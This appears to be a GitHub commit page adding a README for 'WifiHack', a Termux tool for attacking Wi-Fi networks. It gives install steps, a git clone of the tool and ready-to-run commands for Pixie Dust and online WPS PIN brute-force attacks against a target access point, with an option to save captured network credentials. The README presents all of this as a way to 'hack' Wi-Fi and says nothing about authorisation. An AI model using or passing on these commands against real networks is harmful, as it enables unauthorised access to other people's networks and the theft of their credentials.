Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
Gtajisan authored Sep 25, 2023
1 parent 9461621 commit c28979c
Showing 1 changed file with 93 additions and 0 deletions.
93 changes: 93 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,93 @@

### Hack WIfi Using Termux! (Requires Root)
<p align="center"><img src="https://i.ibb.co/ygb9X0K/Screenshot-2023-04-13-12-18-19-365-com-termux.jpg"></p>

## [Termux](https://termux.com/)
Please note that root access is required.

### Manually
**Installing requirements**
```
pkg install -y root-repo
```
```
pkg install -y git tsu python wpa-supplicant pixiewps iw openssl
```
### Getting WifiHack
```
git clone --depth 1 https://github.com/Gtajisan/WifiHack
```
```
cd WifiHack
```
### Running
```
sudo python farhan.py -i wlan0 -K
```
### One line Command
```
sudo python WifiHack/farhan.py -i wlan0 -K
```

# Usage
```
farhan.py <arguments>
Required arguments:
-i, --interface=<wlan0> : Name of the interface to use
Optional arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-B, --bruteforce : Run online bruteforce attack
--push-button-connect : Run WPS push button connection
Advanced arguments:
-d, --delay=<n> : Set the delay between pin attempts [0]
-w, --write : Write AP credentials to the file on success
-F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd : Alway print Pixiewps command
--vuln-list=<filename> : Use custom file with vulnerable devices list ['vulnwsc.txt']
--iface-down : Down network interface when the work is finished
-l, --loop : Run in a loop
-r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
--mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
(for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
-v, --verbose : Verbose output
```

## Usage examples
Start Pixie Dust attack on a specified BSSID:
```
sudo python3 farhan.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
```
Show avaliable networks and start Pixie Dust attack on a specified network:
```
sudo python3 farhan.py -i wlan0 -K
```
Launch online WPS bruteforce with the specified first half of the PIN:
```
sudo python3 farhan.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
```
Start WPS push button connection:s
```
sudo python3 farhan.py -i wlan0 --pbc
```
## Troubleshooting
#### "RTNETLINK answers: Operation not possible due to RF-kill"
Just run:
```sudo rfkill unblock wifi```
#### "Device or resource busy (-16)"
Try disabling Wi-Fi in the system settings and kill the Network manager. Alternatively, you can try running OneShot with ```--iface-down``` argument.
#### The wlan0 interface disappears when Wi-Fi is disabled on Android devices with MediaTek SoC
Try running WifiHack with the `--mtk-wifi` flag to initialize Wi-Fi device driver.
# Acknowledgements
## Special Than all root users
* FARHAN X ME
## [Facebook](https://www.facebook.com/profile.php?id=100094924471568&mibextid=ZbWKwL)

## [Whatsapp](https://wa.me/+880130505723*)

## Thanks For Using This Tool 🐸🙄
## ki obsta 🤡
## cd WifiHack sudo python WifiHack/farhan.py -i wlan0 -K

0 comments on commit c28979c

Please sign in to comment.